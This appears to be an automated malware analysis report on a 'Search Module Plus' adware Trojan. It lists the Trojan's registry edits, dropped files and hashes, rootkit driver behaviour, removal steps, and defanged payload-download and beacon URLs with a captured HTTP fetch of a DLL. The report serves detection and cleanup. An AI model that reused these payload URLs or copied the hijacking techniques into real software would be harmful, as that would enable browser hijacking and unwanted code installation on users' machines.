"FaviconURL" = "http://www-searching.com/favicon.ico"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process tcpsvcs.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"
[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"DisplayName" = "Search Module Plus"
"Publisher" = "Goobzo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,"
"UserId" = "732923889-1296844034-1208581001"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
MD5 | File path |
---|---|
c5bf0ea484893a959b3ef0e7f041f379 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll |
29f111a07a51d38b8379171d3cf39ddb | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe |
2dd50829f5ce91e033636553405263ca | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe |
a879b0ae2ad98ac8e1c0f8912837eb2d | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll |
5931f1438015a3e263226d6ea4a8b182 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe |
675f7fdc1224c197df5e7eef84d1a8f9 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll |
10ba4048085923cf264eaeee708e98ab | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe |
4db4b7e64f2fb4e5394d085afb429280 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smp.exe |
556b1f1d6fd1f191c77b1167cd006abc | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe |
c9828a10a4b5644cf236b1cce749dddb | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys |
05c47da12b0009bd98653f51287f7768 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 2.11.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.0.999
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 2.11.0.999Legal Copyright: Copyright (C) 2014Legal Trademarks: Original Filename: Internal Name: File Version: 2.11.0.999File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 760735 | 760832 | 4.56168 | a9cacf15e913be2edf8056b7b3c7c54e |
.rdata | 765952 | 234734 | 235008 | 3.03602 | c4a59491089058aee935dcac3ad25217 |
.data | 1003520 | 24872 | 9216 | 2.60093 | 4fa01dc463d1d2fe998b6fb156e49847 |
.rsrc | 1032192 | 30912 | 31232 | 3.43692 | ffbcb515ad454512ea92926edc9d30de |
.reloc | 1064960 | 48620 | 48640 | 4.61783 | 73b154c681e17bd08459beb64281acae |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll | 54.192.203.182 |
hxxp://d11sfnc01fj8ag.cloudfront.net/SetterExeV18.exe | 54.192.203.231 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw== | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw== | 54.192.203.78 |
hxxp://d13s98z2lzti92.cloudfront.net/smw121634dp.exe | 54.192.203.172 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w= | 54.192.203.78 |
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ== | 54.192.203.78 |
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A | 54.192.203.154 |
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8e5f14f8a0400cd752505753c0d3e3a5&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A | 54.192.203.154 |
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=c4fa67064bd22dd0878e685855ab7e9a&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A | 54.192.203.154 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bxsdk32.dll HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dyd9qf154h76q.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 942080
Connection: keep-alive
Date: Thu, 16 Mar 2017 13:47:42 GMT
Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT
ETag: "05c47da12b0009bd98653f51287f7768"
